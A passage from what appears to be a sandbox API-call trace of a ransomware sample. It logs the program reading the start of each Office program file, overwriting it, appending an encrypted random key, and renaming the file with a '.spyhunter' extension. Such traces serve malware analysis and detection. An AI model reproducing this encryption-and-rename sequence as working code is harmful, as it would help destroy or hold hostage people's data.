(HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0109.918] ReadFile (in: hFile=0x15c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa4c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57fa4c*=0x2796, lpOverlapped=0x0) returned 1 [0109.939] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd86a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.939] WriteFile (in: hFile=0x15c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2796, lpNumberOfBytesWritten=0x57fa4c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57fa4c*=0x2796, lpOverlapped=0x0) returned 1 [0109.939] GetProcessHeap () returned 0x2c0000 [0109.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0109.939] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.939] WriteFile (in: hFile=0x15c, lpBuffer=0x57fa8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa4c, lpOverlapped=0x0 | out: lpBuffer=0x57fa8c*, lpNumberOfBytesWritten=0x57fa4c*=0x4, lpOverlapped=0x0) returned 1 [0109.940] WriteFile (in: hFile=0x15c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa4c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa4c*=0x30, lpOverlapped=0x0) returned 1 [0109.940] CloseHandle (hObject=0x15c) returned 1 [0109.940] GetProcessHeap () returned 0x2c0000 [0109.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0109.940] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\TOOLICON.ICO.spyhunter") returned 86 [0109.940] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\TOOLICON.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\toolicon.ico"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\TOOLICON.ICO.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\toolicon.ico.spyhunter")) returned 1 [0109.940] GetProcessHeap () returned 0x2c0000 [0109.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0109.941] GetProcessHeap () returned 0x2c0000 [0109.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0109.941] GetProcessHeap () returned 0x2c0000 [0109.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c9ff10 | out: hHeap=0x2c0000) returned 1 [0109.941] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa90 | out: pbBuffer=0x57fa90) returned 1 [0109.941] GetProcessHeap () returned 0x2c0000 [0109.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0109.941] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa88*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa88*=0x30) returned 1 [0109.941] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\INFOPATH.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\infopath.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0109.955] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\INFOPATH.EXE") returned 59 [0109.955] StrStrW (lpFirst="INFOPATH.EXE", lpSrch=".txt") returned 0x0 [0109.955] GetProcessHeap () returned 0x2c0000 [0109.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0109.955] ReadFile (in: hFile=0x15c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa4c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57fa4c*=0x2800, lpOverlapped=0x0) returned 1 [0109.972] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.972] WriteFile (in: hFile=0x15c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fa4c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57fa4c*=0x2800, lpOverlapped=0x0) returned 1 [0109.972] GetProcessHeap () returned 0x2c0000 [0109.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0109.972] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.972] WriteFile (in: hFile=0x15c, lpBuffer=0x57fa8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa4c, lpOverlapped=0x0 | out: lpBuffer=0x57fa8c*, lpNumberOfBytesWritten=0x57fa4c*=0x4, lpOverlapped=0x0) returned 1 [0109.973] WriteFile (in: hFile=0x15c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa4c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa4c*=0x30, lpOverlapped=0x0) returned 1 [0109.974] CloseHandle (hObject=0x15c) returned 1 [0109.974] GetProcessHeap () returned 0x2c0000 [0109.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0109.978] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\INFOPATH.EXE.spyhunter") returned 69 [0109.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\INFOPATH.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\infopath.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\INFOPATH.EXE.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\infopath.exe.spyhunter")) returned 1 [0109.979] GetProcessHeap () returned 0x2c0000 [0109.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0109.979] GetProcessHeap () returned 0x2c0000 [0109.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0109.979] GetProcessHeap () returned 0x2c0000 [0109.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x332240 | out: hHeap=0x2c0000) returned 1 [0109.979] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa88 | out: pbBuffer=0x57fa88) returned 1 [0109.979] GetProcessHeap () returned 0x2c0000 [0109.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0109.979] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa80*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa80*=0x30) returned 1 [0109.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMUTIL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\imutil.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0109.979] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMUTIL.DLL") returned 57 [0109.979] StrStrW (lpFirst="IMUTIL.DLL", lpSrch=".txt") returned 0x0 [0109.979] GetProcessHeap () returned 0x2c0000 [0109.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0109.980] ReadFile (in: hFile=0x15c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57fa44*=0x2800, lpOverlapped=0x0) returned 1 [0109.986] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.986] WriteFile (in: hFile=0x15c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fa44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57fa44*=0x2800, lpOverlapped=0x0) returned 1 [0109.986] GetProcessHeap () returned 0x2c0000 [0109.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0109.986] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.986] WriteFile (in: hFile=0x15c, lpBuffer=0x57fa84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa44, lpOverlapped=0x0 | out: lpBuffer=0x57fa84*, lpNumberOfBytesWritten=0x57fa44*=0x4, lpOverlapped=0x0) returned 1 [0110.009] WriteFile (in: hFile=0x15c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa44, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa44*=0x30, lpOverlapped=0x0) returned 1 [0110.009] CloseHandle (hObject=0x15c) returned 1 [0110.080] GetProcessHeap () returned 0x2c0000 [0110.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0110.081] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMUTIL.DLL.spyhunter") returned 67 [0110.081] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMUTIL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\imutil.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMUTIL.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\imutil.dll.spyhunter")) returned 1 [0110.093] GetProcessHeap () returned 0x2c0000 [0110.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0110.093] GetProcessHeap () returned 0x2c0000 [0110.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0110.093] GetProcessHeap () returned 0x2c0000 [0110.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x332000 | out: hHeap=0x2c0000) returned 1 [0110.093] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa88 | out: pbBuffer=0x57fa88) returned 1 [0110.093] GetProcessHeap () returned 0x2c0000 [0110.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0110.093] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa80*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa80*=0x30) returned 1 [0110.093] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\HVAC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\hvac.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0110.848] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\HVAC.DLL") returned 55 [0110.848] StrStrW (lpFirst="HVAC.DLL", lpSrch=".txt") returned 0x0 [0110.848] GetProcessHeap () returned 0x2c0000 [0110.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0110.848] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57fa44*=0x2800, lpOverlapped=0x0) returned 1 [0110.857] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.857] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fa44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57fa44*=0x2800, lpOverlapped=0x0) returned 1 [0110.857] GetProcessHeap () returned 0x2c0000 [0110.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0110.857] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.857] WriteFile (in: hFile=0xb4, lpBuffer=0x57fa84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa44, lpOverlapped=0x0 | out: lpBuffer=0x57fa84*, lpNumberOfBytesWritten=0x57fa44*=0x4, lpOverlapped=0x0) returned 1 [0110.886] WriteFile (in: hFile=0xb4, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa44, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa44*=0x30, lpOverlapped=0x0) returned 1 [0110.887] CloseHandle (hObject=0xb4) returned 1 [0110.912] GetProcessHeap () returned 0x2c0000 [0110.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c7e1b0 [0110.912] wnsprintfW (in: pszDest=0x2c7e1b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\HVAC.DLL.spyhunter") returned 65 [0110.912] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\HVAC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\hvac.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\HVAC.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\hvac.dll.spyhunter")) returned 1 [0110.914] GetProcessHeap () returned 0x2c0000 [0110.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e1b0 | out: hHeap=0x2c0000) returned 1 [0110.914] GetProcessHeap () returned 0x2c0000 [0110.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0110.914] GetProcessHeap () returned 0x2c0000 [0110.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329f48 | out: hHeap=0x2c0000) returned 1 [0110.914] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa80 | out: pbBuffer=0x57fa80) returned 1 [0110.914] GetProcessHeap () returned 0x2c0000 [0110.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0110.914] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa78*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa78*=0x30) returned 1 [0110.914] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.SharePoint.BusinessData.Administration.Client.dll" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.sharepoint.businessdata.administration.client.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0110.915] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.SharePoint.BusinessData.Administration.Client.dll") returned 106 [0110.915] StrStrW (lpFirst="Microsoft.SharePoint.BusinessData.Administration.Client.dll", lpSrch=".txt") returned 0x0 [0110.915] GetProcessHeap () returned 0x2c0000 [0110.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0110.915] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57fa3c*=0x2800, lpOverlapped=0x0) returned 1 [0110.945] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.946] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fa3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57fa3c*=0x2800, lpOverlapped=0x0) returned 1 [0110.946] GetProcessHeap () returned 0x2c0000 [0110.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0110.946] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.946] WriteFile (in: hFile=0xb4, lpBuffer=0x57fa7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa3c, lpOverlapped=0x0 | out: lpBuffer=0x57fa7c*, lpNumberOfBytesWritten=0x57fa3c*=0x4, lpOverlapped=0x0) returned 1 [0111.029] WriteFile (in: hFile=0xb4, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa3c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa3c*=0x30, lpOverlapped=0x0) returned 1 [0111.029] CloseHandle (hObject=0xb4) returned 1 [0111.029] GetProcessHeap () returned 0x2c0000 [0111.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0111.029] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.SharePoint.BusinessData.Administration.Client.dll.spyhunter") returned 116 [0111.029] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.SharePoint.BusinessData.Administration.Client.dll" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.sharepoint.businessdata.administration.client.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Microsoft.SharePoint.BusinessData.Administration.Client.dll.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\microsoft.sharepoint.businessdata.administration.client.dll.spyhunter")) returned 1 [0111.029] GetProcessHeap () returned 0x2c0000 [0111.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0111.029] GetProcessHeap () returned 0x2c0000 [0111.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0111.030] GetProcessHeap () returned 0x2c0000 [0111.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cecab0 | out: hHeap=0x2c0000) returned 1 [0111.030] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa80 | out: pbBuffer=0x57fa80) returned 1 [0111.030] GetProcessHeap () returned 0x2c0000 [0111.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0111.030] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa78*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa78*=0x30) returned 1 [0111.030] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLPH.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\outlph.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0111.030] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLPH.DLL") returned 57 [0111.030] StrStrW (lpFirst="OUTLPH.DLL", lpSrch=".txt") returned 0x0 [0111.030] GetProcessHeap () returned 0x2c0000 [0111.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0111.030] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57fa3c*=0x2800, lpOverlapped=0x0) returned 1 [0111.068] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.068] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fa3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57fa3c*=0x2800, lpOverlapped=0x0) returned 1 [0111.069] GetProcessHeap () returned 0x2c0000 [0111.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0111.069] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.069] WriteFile (in: hFile=0xb4, lpBuffer=0x57fa7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa3c, lpOverlapped=0x0 | out: lpBuffer=0x57fa7c*, lpNumberOfBytesWritten=0x57fa3c*=0x4, lpOverlapped=0x0) returned 1 [0111.336] WriteFile (in: hFile=0xb4, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa3c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa3c*=0x30, lpOverlapped=0x0) returned 1 [0111.336] CloseHandle (hObject=0xb4) returned 1 [0111.336] GetProcessHeap () returned 0x2c0000 [0111.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0111.336] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLPH.DLL.spyhunter") returned 67 [0111.336] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLPH.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\outlph.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OUTLPH.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\outlph.dll.spyhunter")) returned 1 [0111.337] GetProcessHeap () returned 0x2c0000 [0111.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0111.337] GetProcessHeap () returned 0x2c0000 [0111.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0111.337] GetProcessHeap () returned 0x2c0000 [0111.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e2bf20 | out: hHeap=0x2c0000) returned 1 [0111.337] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa78 | out: pbBuffer=0x57fa78) returned 1 [0111.337] GetProcessHeap () returned 0x2c0000 [0111.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0111.337] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa70*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa70*=0x30) returned 1 [0111.337] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.ie.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0111.343] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IE.XML") returned 79 [0111.343] StrStrW (lpFirst="YAHOO.IE.XML", lpSrch=".txt") returned 0x0 [0111.343] GetProcessHeap () returned 0x2c0000 [0111.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0111.343] ReadFile (in: hFile=0x15c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57fa34*=0x32a, lpOverlapped=0x0) returned 1 [0111.368] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffcd6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.368] WriteFile (in: hFile=0x15c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x32a, lpNumberOfBytesWritten=0x57fa34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57fa34*=0x32a, lpOverlapped=0x0) returned 1 [0111.369] GetProcessHeap () returned 0x2c0000 [0111.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0111.369] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.369] WriteFile (in: hFile=0x15c, lpBuffer=0x57fa74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa34, lpOverlapped=0x0 | out: lpBuffer=0x57fa74*, lpNumberOfBytesWritten=0x57fa34*=0x4, lpOverlapped=0x0) returned 1 [0111.369] WriteFile (in: hFile=0x15c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa34, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa34*=0x30, lpOverlapped=0x0) returned 1 [0111.369] CloseHandle (hObject=0x15c) returned 1 [0111.369] GetProcessHeap () returned 0x2c0000 [0111.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc7358 [0111.369] wnsprintfW (in: pszDest=0x2cc7358, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IE.XML.spyhunter") returned 89 [0111.369] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program 